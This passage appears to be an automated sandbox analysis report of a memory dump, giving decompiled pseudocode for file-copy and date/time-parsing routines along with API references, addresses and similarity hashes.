						} else {
							_v1652 = _v1648;
							_t214 = E0033585F(_v1648,  &_v1668, 1);
							_v1652 = _t214;
							if(_t214 != 0) {
								if(_v1648 >= _v1668) {
									_t232 = _v1668;
									L17:
									_v1652 = _t232;
								}
								_t421 =  *(_t419 + 0x20);
								_v1648 = _t421;
								while(1) {
									_t214 = E0033AD44( *_t421);
									if(_t214 != 0) {
										break;
									}
									_t421 = _t421[8];
									_v1648 = _t421;
									if(_t421 != 0) {
										continue;
									} else {
										_t316 = _t214;
										goto L141;
									}
									goto L142;
								}
								_t391 =  *_t421;
								__eflags = 0;
								E003468BA(E00346A00,  *_t421, 0x21, 0, _t421[6],  &_v1664);
								while(1) {
									_t421[7] = _t421[7] & 0xffff3fff;
									_t236 = _t421[7];
									__eflags = _t236 & 0x00000004;
									if((_t236 & 0x00000004) != 0) {
										_t307 = _t236 & 0xfffffffb | 0x00000002;
										__eflags = _t307;
										_t421[7] = _t307;
									}
									__eflags =  *0x35d544;
									if( *0x35d544 != 0) {
										break;
									}
									_t391 = _v40;
									__eflags = _v40;
									if(_v40 == 0) {
										_t391 =  &_v560;
									}
									_t237 = E0033579C(_t421, _t391, _v32);
									__eflags = _t237 - _t316;
									if(_t237 == _t316) {
										break;
									} else {
										_push(_t421[1]);
										E003425D9(L"%s\r\n");
										_t239 = _v1112;
										__eflags = _t239;
										if(_t239 == 0) {
											_t239 =  &_v1632;
										}
										_t391 = _v1640;
										_t240 = E00335226(_t421, _v1640, _t239, _v1104, 0);
										__eflags = _t240 - _t316;
										if(_t240 == _t316) {
											break;
										} else {
											_t392 = _v1112;
											_t241 = _t392;
											__eflags = _t392;
											if(_t392 == 0) {
												_t241 =  &_v1632;
											}
											__eflags =  *_t241;
											if( *_t241 != 0) {
												__eflags = _t392;
												if(_t392 == 0) {
													_t392 =  &_v1632;
												}
												_t244 = E00358F66(_t421[1], _t392);
												_t346 = _t421[1];
												__eflags = _t244;
												if(_t244 == 0) {
													_t422 = E00335DB5(_t346, (_t421[7] & 0x00000800) << 0xa, _t346, _t346);
													__eflags = _t422 - 0xffffffff;
													if(_t422 == 0xffffffff) {
														E0033CD27(_v1664);
														L135:
														_t348 = 0x6e;
														E0035985A(_t348);
														L130:
														__eflags = 0;
														E003585E9(0, _t316);
														L131:
														E0033CD27(_v1664);
														E0033DB92(_t422);
														_t352 = _v1668;
														L129:
														E0033DB92(_t352);
														goto L130;
													}
													_t252 = E00340178(_t245);
													__eflags = _t252;
													if(_t252 == 0) {
														_t354 = _v1652;
													} else {
														_t354 = 0x80;
														_v1652 = 0x80;
													}
													_t253 = _v1112;
													__eflags = _t253;
													if(_t253 == 0) {
														_t253 =  &_v1632;
													}
													_t415 = _v1648;
													_t255 = E00335712(_t422, _v1660, _t354,  &_v1656, _v1648, _t413, _t253);
													__eflags =  *0x373cf0;
													_v1656 = _t255;
													if( *0x373cf0 != 0) {
														_t356 = _v1664;
														L137:
														E0033CD27(_t356);
														_t357 = _t422;
														L134:
														E0033DB92(_t357);
														goto L135;
													}
													_t358 = _v1112;
													__eflags = _t358;
													if(_t358 == 0) {
														_t358 =  &_v1632;
													}
													_t258 = GetFileAttributesW(_t358);
													_t359 = _v1112;
													__eflags = _t258 & 0x00000002;
													if((_t258 & 0x00000002) != 0) {
														__eflags = _t359;
														if(_t359 == 0) {
															_t359 =  &_v1632;
														}
														_t360 = E00335DB5(_t359, _t316, _t359, _t359);
														_v1680 = _t360;
														_v1676 = _t360;
													} else {
														__eflags = _t359;
														if(__eflags == 0) {
															_t359 =  &_v1632;
														}
														_t303 = E003343A0(_t359, __eflags);
														_v1672 = _t303;
														_v1668 = _t303;
														__eflags = _t303 - 0xffffffff;
														if(_t303 == 0xffffffff) {
															L136:
															_t356 = _v1664;
															goto L137;
														}
														__imp___get_osfhandle(_t303);
														SetEndOfFile(_t303);
														_t360 = _v1672;
													}
													__eflags = _t360 - 0xffffffff;
													if(_t360 == 0xffffffff) {
														goto L136;
													}
													__eflags =  *0x35d5cc;
													if( *0x35d5cc == 0) {
														L69:
														_t260 = _v1636;
														while(1) {
															__eflags = _t260 - _t316;
															if(_t260 != _t316) {
																goto L84;
															}
															_t291 = _v1112;
															__eflags = _t291;
															if(_t291 == 0) {
																_t291 =  &_v1632;
															}
															_t292 = E0035916C(_t360, _v1660, _v1656, _t291, _t422);
															__eflags =  *0x35d560;
															_t382 = _v1684;
															if( *0x35d560 != 0) {
																_t295 = E00340178(_t292);
																__eflags = _t295;
																if(_t295 != 0) {
																	_t382 = _v1672;
																} else {
																	_t408 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t408 =  &_v1632;
																	}
																	_t296 = E003584FE(_t295, _t408, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t296 - _t316;
																	if(_t296 == _t316) {
																		goto L131;
																	}
																	_t382 = _v1668;
																	_v1672 = _v1668;
																}
															}
															_t293 = _v1112;
															__eflags = _t293;
															if(_t293 == 0) {
																_t293 =  &_v1632;
															}
															_t260 = E00335712(_t422, _v1660, _v1652,  &_v1656, _t415, _t382, _t293);
															__eflags =  *0x35d5cc;
															if( *0x35d5cc == 0) {
																_t360 = _v1672;
																continue;
															}
															goto L84;
														}
													} else {
														__eflags = _v1656;
														if(_v1656 > 0) {
															_t297 = _v1112;
															__eflags = _t297;
															if(_t297 == 0) {
																_t297 =  &_v1632;
															}
															_t298 = E0035916C(_t360, _v1660, _v1656, _t297, _t422);
															__eflags =  *0x35d560;
															_t360 = _v1684;
															if( *0x35d560 != 0) {
																_t299 = E00340178(_t298);
																__eflags = _t299;
																if(_t299 != 0) {
																	_t360 = _v1672;
																} else {
																	_t410 = _v1112;
																	__eflags = _v1112;
																	if(__eflags == 0) {
																		_t410 =  &_v1632;
																	}
																	_t300 = E003584FE(_t299, _t410, __eflags, _v1656, _v1660, _v1644);
																	__eflags = _t300 - _t316;
																	if(_t300 == _t316) {
																		E0033CD27(_v1664);
																		E0033DB92(_t422);
																		_t352 = _v1668;
																		goto L129;
																	}
																	_t360 = _v1668;
																	_v1672 = _v1668;
																}
															}
														}
														__eflags =  *0x35d5cc;
														if( *0x35d5cc == 0) {
															goto L69;
														}
													}
													L84:
													__eflags = 0;
													 *0x35d5cc = 0;
													E0033DB92(_t422);
													_t421 = _v1648;
												} else {
													_t305 = E00358E52(_t421, _v1660, _v1652);
													_v1680 = _t305;
													_v1676 = _t305;
												}
												_t416 = _t421[8];
												_t263 = 0;
												 *0x35d564 = 0;
												__eflags = _t416;
												if(_t416 != 0) {
													do {
														_t265 =  *(_t416 + 0x1c);
														__eflags = _t265 & 0x00000004;
														if((_t265 & 0x00000004) != 0) {
															_t290 = _t265 & 0xfffffffb | 0x00000002;
															__eflags = _t290;
															 *(_t416 + 0x1c) = _t290;
														}
														_t363 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t363 =  &_v1096;
														}
														_t266 = E00335400(_t363, _v568,  *_t416, _t421[1]);
														__eflags = _t266;
														if(_t266 == 0) {
															_t267 = _v576;
															__eflags = _t267;
															if(_t267 == 0) {
																_t267 =  &_v1096;
															}
															_push(_t267);
															E003425D9(L"%s\r\n");
														} else {
															_push(0);
															_push(_t266);
															E0033C108(0);
														}
														_t366 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t366 =  &_v1096;
														}
														_t269 = E0033AD44(_t366);
														__eflags = _t269;
														if(_t269 != 0) {
															_t401 = _v1112;
															__eflags = _v1112;
															if(_v1112 == 0) {
																_t401 =  &_v1632;
															}
															_t367 = _v576;
															__eflags = _v576;
															if(_v576 == 0) {
																_t367 =  &_v1096;
															}
															_t270 = E00358F66(_t367, _t401);
															__eflags = _t270;
															if(_t270 == 0) {
																_t368 = _v576;
																__eflags = _t368;
																if(_t368 == 0) {
																	_t368 =  &_v1096;
																}
																_t422 = E00335DB5(_t368, 0, _t368, _t368);
																__eflags = _t422 - 0xffffffff;
																if(_t422 == 0xffffffff) {
																	E0033CD27(_v1664);
																	_t357 = _v1672;
																	goto L134;
																}
																_t273 = E00340178(_t271);
																__eflags = _t273;
																if(_t273 == 0) {
																	L120:
																	_t371 = _v1652;
																} else {
																	_t371 = 0x80;
																	_v1652 = 0x80;
																}
																__eflags =  *0x35d5cc;
																if( *0x35d5cc == 0) {
																	_t274 = _v1112;
																	__eflags = _t274;
																	if(_t274 == 0) {
																		_t274 =  &_v1632;
																	}
																	_t276 = E00335712(_t422, _v1660, _t371,  &_v1656, _t416, _v1672, _t274);
																	__eflags = _t276;
																	if(_t276 != 0) {
																		_t279 = _v1112;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			_t279 =  &_v1632;
																		}
																		_t280 = E0035916C(_v1672, _v1660, _v1656, _t279, _t422);
																		__eflags =  *0x35d560;
																		if( *0x35d560 != 0) {
																			_t281 = E00340178(_t280);
																			__eflags = _t281;
																			if(_t281 == 0) {
																				_t405 = _v1112;
																				__eflags = _v1112;
																				if(__eflags == 0) {
																					_t405 =  &_v1632;
																				}
																				_t282 = E003584FE(_t281, _t405, __eflags, _v1656, _v1660, _v1644);
																				__eflags = _t282 - _t316;
																				if(_t282 == _t316) {
																					E0033CD27(_v1664);
																					E0033DB92(_t422);
																					_t352 = _v1668;
																					goto L129;
																				}
																				_v1672 = _v1668;
																			}
																		}
																		goto L120;
																	}
																}
																__eflags = 0;
																 *0x35d5cc = 0;
																E0033DB92(_t422);
																_t421 = _v1648;
															} else {
																_push(0);
																_push(0x2340);
																E0033C108(_t367);
															}
														}
														_t416 =  *(_t416 + 0x20);
														__eflags = _t416;
													} while (_t416 != 0);
													_t263 = 0;
													__eflags = 0;
												}
												_t413 = _v1672;
												E003356AE(_t421, _v1640, _v1672, _t263);
											}
											_t391 = _t421[6];
											_t242 = E00346A1C(E00346A00, _t421[6], 0x21, _v1664);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												E0033CD27(_v1664);
												__imp__??_V@YAXPAX@Z(_v576);
												__imp__??_V@YAXPAX@Z(_v40);
												__imp__??_V@YAXPAX@Z(_v1112);
												_t218 = 0;
											}
										}
									}
									goto L142;
								}
								_t214 = E0033CD27(_v1664);
							}
							goto L141;
						}
					}
				}
				L142:
				_pop(_t414);
				_pop(_t420);
				_pop(_t317);
				return E00346FD0(_t218, _t317, _v20 ^ _t431, _t391, _t414, _t420);
			}

0x003585e9
0x003585e9
0x003585ec
0x003585f0
0x003585f2
0x003585f4
0x003585f5
0x003585fb
0x003585fb
0x003585ff
0x00358607
0x00358617
0x00358624
0x00358629
0x00358629
0x00358633
0x00358649
0x00358649
0x0035864e
0x00358654
0x00000000
0x00000000
0x00358640
0x00358644
0x00358644
0x0035865d
0x00358663
0x0035866c
0x00358672
0x00358679
0x00358681
0x00358682
0x00358688
0x0035868d
0x0035868f
0x0035869e
0x003586a3
0x003586a4
0x003586ac
0x003586af
0x003586b6
0x003586be
0x003586cc
0x003586d3
0x003586e4
0x003586ec
0x003586fa
0x00358701
0x00358712
0x0035871d
0x0035873d
0x00358e1a
0x00358e36
0x00358e3b
0x0035879b
0x003587a8
0x003587ad
0x003587b3
0x00000000
0x003587b9
0x003587c0
0x003587f3
0x00000000
0x003587c2
0x003587ce
0x003587d2
0x003587d7
0x003587dd
0x003587eb
0x003587ed
0x003587f7
0x003587f7
0x003587f7
0x003587fb
0x003587fe
0x00358802
0x00358804
0x0035880b
0x00000000
0x00000000
0x0035880d
0x00358810
0x00358816
0x00000000
0x00358818
0x00358818
0x00000000
0x00358818
0x00000000
0x00358816
0x0035881f
0x00358829
0x00358833
0x00358838
0x00358838
0x0035883f
0x00358842
0x00358844
0x00358849
0x00358849
0x0035884c
0x0035884c
0x0035884f
0x00358856
0x00000000
0x00000000
0x0035885c
0x00358863
0x00358865
0x00358867
0x00358867
0x00358877
0x0035887c
0x0035887e
0x00000000
0x00358884
0x00358884
0x0035888c
0x00358891
0x0035889a
0x0035889c
0x0035889e
0x0035889e
0x003588a2
0x003588b2
0x003588b7
0x003588b9
0x00000000
0x003588bf
0x003588bf
0x003588c6
0x003588c8
0x003588ca
0x003588cc
0x003588cc
0x003588d2
0x003588d5
0x003588db
0x003588dd
0x003588df
0x003588df
0x003588e6
0x003588eb
0x003588ee
0x003588f0
0x00358921
0x00358923
0x00358926
0x00358e0a
0x00358de9
0x00358deb
0x00358dec
0x00358da2
0x00358da4
0x00358da6
0x00358dab
0x00358daf
0x00358db6
0x00358dbb
0x00358d9d
0x00358d9d
0x00000000
0x00358d9d
0x0035892e
0x00358933
0x00358935
0x00358942
0x00358937
0x00358937
0x0035893c
0x0035893c
0x00358946
0x0035894d
0x0035894f
0x00358951
0x00358951
0x0035895b
0x00358968
0x0035896d
0x00358974
0x00358978
0x00358e00
0x00358df7
0x00358df7
0x00358dfc
0x00358de4
0x00358de4
0x00000000
0x00358de4
0x0035897e
0x00358985
0x00358987
0x00358989
0x00358989
0x0035898e
0x00358994
0x0035899b
0x0035899d
0x003589d2
0x003589d4
0x003589d6
0x003589d6
0x003589e3
0x003589e5
0x003589e9
0x0035899f
0x0035899f
0x003589a1
0x003589a3
0x003589a3
0x003589a7
0x003589ac
0x003589b0
0x003589b4
0x003589b7
0x00358df3
0x00358df3
0x00000000
0x00358df3
0x003589be
0x003589c6
0x003589cc
0x003589cc
0x003589ed
0x003589f0
0x00000000
0x00000000
0x003589f6
0x003589fd
0x00358a85
0x00358a85
0x00358a8f
0x00358a8f
0x00358a91
0x00000000
0x00000000
0x00358a97
0x00358a9e
0x00358aa0
0x00358aa2
0x00358aa2
0x00358ab0
0x00358ab5
0x00358abc
0x00358ac0
0x00358ac2
0x00358ac7
0x00358ac9
0x00358b01
0x00358acb
0x00358acb
0x00358ad2
0x00358ad4
0x00358ad6
0x00358ad6
0x00358aea
0x00358aef
0x00358af1
0x00000000
0x00000000
0x00358af7
0x00358afb
0x00358afb
0x00358ac9
0x00358b05
0x00358b0c
0x00358b0e
0x00358b10
0x00358b10
0x00358b26
0x00358b2b
0x00358b32
0x00358a8b
0x00000000
0x00358a8b
0x00000000
0x00358b32
0x00358a03
0x00358a03
0x00358a08
0x00358a0a
0x00358a11
0x00358a13
0x00358a15
0x00358a15
0x00358a23
0x00358a28
0x00358a2f
0x00358a33
0x00358a35
0x00358a3a
0x00358a3c
0x00358a74
0x00358a3e
0x00358a3e
0x00358a45
0x00358a47
0x00358a49
0x00358a49
0x00358a5d
0x00358a62
0x00358a64
0x00358d8d
0x00358d94
0x00358d99
0x00000000
0x00358d99
0x00358a6a
0x00358a6e
0x00358a6e
0x00358a3c
0x00358a33
0x00358a78
0x00358a7f
0x00000000
0x00000000
0x00358a7f
0x00358b38
0x00358b38
0x00358b3c
0x00358b41
0x00358b46
0x003588f2
0x003588fc
0x00358901
0x00358905
0x00358905
0x00358b4a
0x00358b4d
0x00358b4f
0x00358b54
0x00358b56
0x00358b5c
0x00358b5c
0x00358b5f
0x00358b61
0x00358b66
0x00358b66
0x00358b69
0x00358b69
0x00358b6c
0x00358b73
0x00358b75
0x00358b77
0x00358b77
0x00358b8a
0x00358b8f
0x00358b91
0x00358b9e
0x00358ba5
0x00358ba7
0x00358ba9
0x00358ba9
0x00358bb0
0x00358bb6
0x00358b93
0x00358b95
0x00358b96
0x00358b97
0x00358b97
0x00358bbd
0x00358bc4
0x00358bc6
0x00358bc8
0x00358bc8
0x00358bcf
0x00358bd4
0x00358bd6
0x00358bdc
0x00358be3
0x00358be5
0x00358be7
0x00358be7
0x00358beb
0x00358bf2
0x00358bf4
0x00358bf6
0x00358bf6
0x00358bfd
0x00358c02
0x00358c04
0x00358c1a
0x00358c21
0x00358c23
0x00358c25
0x00358c25
0x00358c35
0x00358c37
0x00358c3a
0x00358ddb
0x00358de0
0x00000000
0x00358de0
0x00358c42
0x00358c47
0x00358c49
0x00358cf3
0x00358cf3
0x00358c4f
0x00358c4f
0x00358c54
0x00358c54
0x00358cf7
0x00358cfe
0x00358c5d
0x00358c64
0x00358c66
0x00358c68
0x00358c68
0x00358c7e
0x00358c83
0x00358c85
0x00358c87
0x00358c8e
0x00358c90
0x00358c92
0x00358c92
0x00358ca4
0x00358ca9
0x00358cb0
0x00358cb6
0x00358cbb
0x00358cbd
0x00358cbf
0x00358cc6
0x00358cc8
0x00358cca
0x00358cca
0x00358cde
0x00358ce3
0x00358ce5
0x00358dc5
0x00358dcc
0x00358dd1
0x00000000
0x00358dd1
0x00358cef
0x00358cef
0x00358cbd
0x00000000
0x00358cb0
0x00358c85
0x00358d04
0x00358d08
0x00358d0d
0x00358d12
0x00358c06
0x00358c08
0x00358c09
0x00358c0e
0x00358c14
0x00358c04
0x00358d16
0x00358d19
0x00358d19
0x00358d21
0x00358d21
0x00358d21
0x00358d23
0x00358d2f
0x00358d2f
0x00358d38
0x00358d42
0x00358d47
0x00358d49
0x00000000
0x00358d4f
0x00358d53
0x00358d5f
0x00358d6d
0x00358d7b
0x00358d82
0x00358d82
0x00358d49
0x003588b9
0x00000000
0x0035887e
0x00358e15
0x00358e15
0x00000000
0x003587dd
0x003587c0
0x003587b3
0x00358e3d
0x00358e44
0x00358e45
0x00358e46
0x00358e51

APIs

longjmp.MSVCRT(0036B8F8,00000001,00000000,00358DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 0035865D
memset.MSVCRT ref: 003586B6
memset.MSVCRT ref: 003586E4
memset.MSVCRT ref: 00358712

Part of subcall function 0033CD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00359362,00000000,00000000,?,00349814,00000000), ref: 0033CD55

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

Part of subcall function 0033585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,003587AD,?,00000000,-00000105,-00000105,-00000105), ref: 00335875

Strings

%9d, xrefs: 0035860C

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$AllocCloseFindVirtuallongjmp
String ID: %9d
API String ID: 973120493-2241623522
Opcode ID: 7b0a323aa628696d11ba713672eee25169fda9d27f7a61699079c1a4fe53b2d8
Instruction ID: b9b6b6f5263a34d74db490593d3b00a5c47b5f67141a6142796d9ad61e6d230d
Opcode Fuzzy Hash: 7b0a323aa628696d11ba713672eee25169fda9d27f7a61699079c1a4fe53b2d8
Instruction Fuzzy Hash: 9C51C8B1A083809BD336DB35CC86A9B77E8EB84315F00092DF989DB151EF74E944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00353FD4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00353FD4(signed short* __ecx, wchar_t* __edx, char _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				wchar_t* _v28;
				void* _v32;
				void* _v36;
				long _v40;
				wchar_t* _v44;
				signed short* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t45;
				intOrPtr _t46;
				long _t50;
				long _t51;
				signed int _t54;
				signed short _t60;
				void* _t61;
				signed short _t64;
				long _t65;
				signed short* _t69;
				long _t70;
				wchar_t* _t72;
				signed short* _t73;
				wchar_t* _t75;
				long _t77;
				signed int _t81;
				signed int _t82;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;

				_t42 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t42 ^ _t93;
				_t2 =  &_a4; // 0x353f3c
				_v44 =  *_t2;
				_t72 = __edx;
				_t45 =  *0x35d540; // 0x0
				_v48 = __ecx;
				_t92 = 2;
				_t46 = _t45;
				if(_t46 == 0) {
					_v32 =  &_v16;
					_v36 =  &_v20;
					goto L5;
				} else {
					if(_t46 == _t92) {
						_t9 =  &_v12; // 0x353f3c
						_t91 = 0;
						_v32 = _t9;
						_v36 =  &_v16;
					} else {
						_v32 =  &_v20;
						_v36 =  &_v16;
						L5:
						_t91 = _t92;
					}
				}
				_v24 = 0;
				do {
					_t50 =  *_t72 & 0x0000ffff;
					_v28 = _t72;
					if(_t50 == 0) {
						L11:
						_t51 = wcstol(_t72, 0, 0xa);
						_t90 = _v24;
						_t94 = _t94 + 0xc;
						_t75 = _v28;
						_v40 = _t51;
						 *(_t93 + _t90 * 4 - 0x10) = _t51;
						_t54 = _t75 - _t72 >> 1;
						if(_t90 != _t91) {
							if(_t54 == 1 || _t54 == _t92) {
								goto L19;
							} else {
								goto L16;
							}
						} else {
							if(_t54 == _t92 || _t54 == 4) {
								if(_t54 != 4 || _v40 >= 0x640) {
									L19:
									_t73 = _t75 + 2;
									if(_t90 >= _t92) {
										goto L23;
									} else {
										_t65 =  *_t73 & 0x0000ffff;
										if(_t65 == 0 || wcschr(_v44, _t65) == 0) {
											goto L16;
										} else {
											_t90 = _v24;
											goto L23;
										}
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						}
					} else {
						_t77 = _t50;
						while(iswdigit(_t77) != 0) {
							_t69 = _v28 + _t92;
							_v28 = _t69;
							_t70 =  *_t69 & 0x0000ffff;
							_t77 = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								goto L11;
							}
							goto L34;
						}
						L16:
						_t61 = 0;
					}
					L34:
					return E00346FD0(_t61, _t73, _v8 ^ _t93, _t90, _t91, _t92);
					L23:
					_v24 = _t90;
					_t72 = E0033D7E6(_t73);
				} while (_v24 < 3);
				_t73 = _v48;
				_t73[3] =  *_v32;
				_t73[1] =  *_v36;
				_t60 =  *(_t93 + _t91 * 4 - 0x10);
				if(_t60 < 0) {
					goto L16;
				} else {
					_t81 = _t60 & 0x0000ffff;
					if(_t60 > 0x4f) {
						_t92 = _t81;
						_t90 = _t81;
						if(_t60 < 0x50 || _t60 > 0x63) {
							_t82 = _t92;
							if(_t60 < 0x64) {
								goto L33;
							} else {
								_t82 = _t90;
								if(_t60 <= 0x7bb) {
									goto L16;
								} else {
									goto L33;
								}
							}
						} else {
							_t64 = _t60 + 0x76c;
							goto L30;
						}
					} else {
						_t64 = _t60 + 0x7d0;
						L30:
						_t82 = _t64 & 0x0000ffff;
						L33:
						 *_t73 = _t82;
						_t61 = 1;
					}
				}
				goto L34;
			}

0x00353fdc
0x00353fe3
0x00353fe6
0x00353fec
0x00353fef
0x00353ff1
0x00353ff6
0x00353ffb
0x00353ffc
0x00353fff
0x00354026
0x0035402c
0x00000000
0x00354001
0x00354003
0x00354013
0x00354016
0x00354018
0x0035401e
0x00354005
0x00354008
0x0035400e
0x0035402f
0x0035402f
0x0035402f
0x00354003
0x00354033
0x00354036
0x00354036
0x00354039
0x0035403f
0x00354061
0x00354066
0x0035406c
0x0035406f
0x00354072
0x00354075
0x00354078
0x00354080
0x00354084
0x003540a7
0x00000000
0x00000000
0x00000000
0x00000000
0x00354086
0x00354088
0x00354092
0x003540ad
0x003540ad
0x003540b2
0x00000000
0x003540b4
0x003540b4
0x003540ba
0x00000000
0x003540cc
0x003540cc
0x00000000
0x003540cc
0x003540ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00354088
0x00354041
0x00354041
0x00354043
0x00354052
0x00354054
0x00354057
0x0035405a
0x0035405f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0035405f
0x0035409d
0x0035409d
0x0035409d
0x00354146
0x00354156
0x003540cf
0x003540d2
0x003540de
0x003540de
0x003540e9
0x003540ef
0x003540f9
0x003540fd
0x00354103
0x00000000
0x00354105
0x00354105
0x0035410b
0x00354114
0x00354116
0x0035411b
0x0035412c
0x00354131
0x00000000
0x00354133
0x00354133
0x0035413a
0x00000000
0x00000000
0x00000000
0x00000000
0x0035413a
0x00354122
0x00354122
0x00000000
0x00354122
0x0035410d
0x0035410d
0x00354127
0x00354127
0x00354140
0x00354142
0x00354145
0x00354145
0x0035410b
0x00000000

APIs

iswdigit.MSVCRT ref: 00354044
wcstol.MSVCRT ref: 00354066
wcschr.MSVCRT ref: 003540C0

Strings

<?5:, xrefs: 00354013
<?5:, xrefs: 00353FE6

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: iswdigitwcschrwcstol
String ID: <?5:$<?5:
API String ID: 2478187640-3907895283
Opcode ID: 78b4af31e5dd34c95699e07995e05fc8189571466072afa3c7ff3df3d9bf2cdb
Instruction ID: 5b3dea2557bf40dda60261590d37371d2abe9cff49d101dd01da00b4c5394c0a
Opcode Fuzzy Hash: 78b4af31e5dd34c95699e07995e05fc8189571466072afa3c7ff3df3d9bf2cdb
Instruction Fuzzy Hash: 28515374E002198BDF1ACF65D880ABDF7B4EF5870AF24442ADD15E72A0E734D989CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00354159, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00354159(signed int __ecx, wchar_t* __edx, char _a4) {
				signed int _v8;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				long _t29;
				void* _t30;
				void* _t32;
				int _t36;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				long _t45;
				long _t46;
				signed int _t48;
				wchar_t* _t52;
				int _t55;
				signed int _t59;
				void* _t64;
				long* _t66;
				intOrPtr _t69;
				long* _t73;
				void* _t77;
				void* _t78;
				void* _t79;
				wchar_t* _t81;
				signed int _t83;
				signed int _t84;
				void* _t85;

				_t26 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t26 ^ _t84;
				_t2 =  &_a4; // 0x353f43
				_v32 = __ecx;
				_v28 =  *_t2;
				_t52 = __edx;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 = 0;
				_v24 = __ecx + 8;
				_t77 = 0;
				while(1) {
					_t81 = _t52;
					_t8 =  &(_t81[0]); // 0x2
					_t73 = _t8;
					do {
						_t29 =  *_t81;
						_t81 =  &(_t81[0]);
					} while (_t29 != _t55);
					_t83 = _t81 - _t73 >> 1;
					if(_t83 > 2 || iswdigit( *_t52 & 0x0000ffff) == 0) {
						L16:
						_t74 =  *_t52 & 0x0000ffff;
						if(( *_t52 & 0x0000ffff) == 0) {
							goto L31;
						} else {
							if(E0033D7D4( &_v20, _t74) == 0) {
								goto L11;
							} else {
								goto L18;
							}
						}
					} else {
						_t45 = _t52[0] & 0x0000ffff;
						if(_t45 == 0 || iswdigit(_t45) != 0) {
							_t46 = wcstol(_t52, 0, 0xa);
							_t66 = _v24;
							_t52 = _t52 + _t83 * 2 + 2;
							_t85 = _t85 + 0xc;
							 *_t66 = _t46;
							_t74 =  *_t52 & 0x0000ffff;
							_v24 =  &(_t66[0]);
							if(( *_t52 & 0x0000ffff) == 0) {
								L31:
								_t77 = _t77 + 1;
								_t30 = 4;
								if(_t77 < _t30) {
									_t78 = _v24;
									_t59 = _t30 - _t77 >> 1;
									_t36 = memset(_t78, 0, _t59 << 2);
									_t79 = _t78 + _t59;
									asm("adc ecx, ecx");
									memset(_t79, _t36, 0);
									_t77 = _t79;
								}
								_t32 = 1;
							} else {
								if(E0033D7D4( &_v20, _t74) != 0) {
									L18:
									_t39 =  *_t52 & 0x0000ffff;
									if(_t39 == 0x70 || _t39 == 0x50) {
										_t64 = 1;
									} else {
										_t64 = 0;
									}
									_t40 = _t52[1] & 0x0000ffff;
									if(_t40 == 0 || _t40 == 0x6d || _t40 == 0x4d) {
										_t74 = _v32;
										_t41 =  *(_t74 + 8) & 0x0000ffff;
										if(_t64 == 0) {
											if(_t41 == 0xc) {
												_t42 = 0;
												goto L30;
											}
										} else {
											if(_t41 != 0xc) {
												_t42 = _t41 + 0xc;
												L30:
												 *(_t74 + 8) = _t42;
											}
										}
										goto L31;
									} else {
										goto L11;
									}
								} else {
									_t48 =  *_t52 & 0x0000ffff;
									_t69 = _v28;
									if(_t77 >= 2) {
										if(_t48 ==  *((intOrPtr*)(_t69 + 2)) || _t48 ==  *((intOrPtr*)(_t69 + 6))) {
											goto L14;
										} else {
											goto L11;
										}
									} else {
										_t74 = _t48;
										if(E0033D7D4(_t69, _t48) != 0) {
											L14:
											_t77 = _t77 + 1;
											_t52 = E0033D7E6(_t52);
											if(_t77 >= 4) {
												goto L16;
											} else {
												_t55 = 0;
												continue;
											}
										} else {
											L11:
											_t32 = 0;
										}
									}
								}
							}
						} else {
							goto L16;
						}
					}
					return E00346FD0(_t32, _t52, _v8 ^ _t84, _t74, _t77, _t83);
				}
			}

0x00354161
0x00354168
0x0035416b
0x00354176
0x0035417c
0x0035417f
0x00354181
0x00354182
0x00354183
0x00354188
0x0035418a
0x0035418d
0x0035418f
0x0035418f
0x00354191
0x00354191
0x00354194
0x00354194
0x00354197
0x0035419a
0x003541a1
0x003541a6
0x0035424b
0x0035424b
0x00354251
0x00000000
0x00354253
0x0035425d
0x00000000
0x00000000
0x00000000
0x00000000
0x0035425d
0x003541bf
0x003541bf
0x003541c6
0x003541d9
0x003541df
0x003541e5
0x003541e8
0x003541eb
0x003541f1
0x003541f4
0x003541fa
0x003542a6
0x003542a8
0x003542a9
0x003542ac
0x003542b0
0x003542b7
0x003542b9
0x003542b9
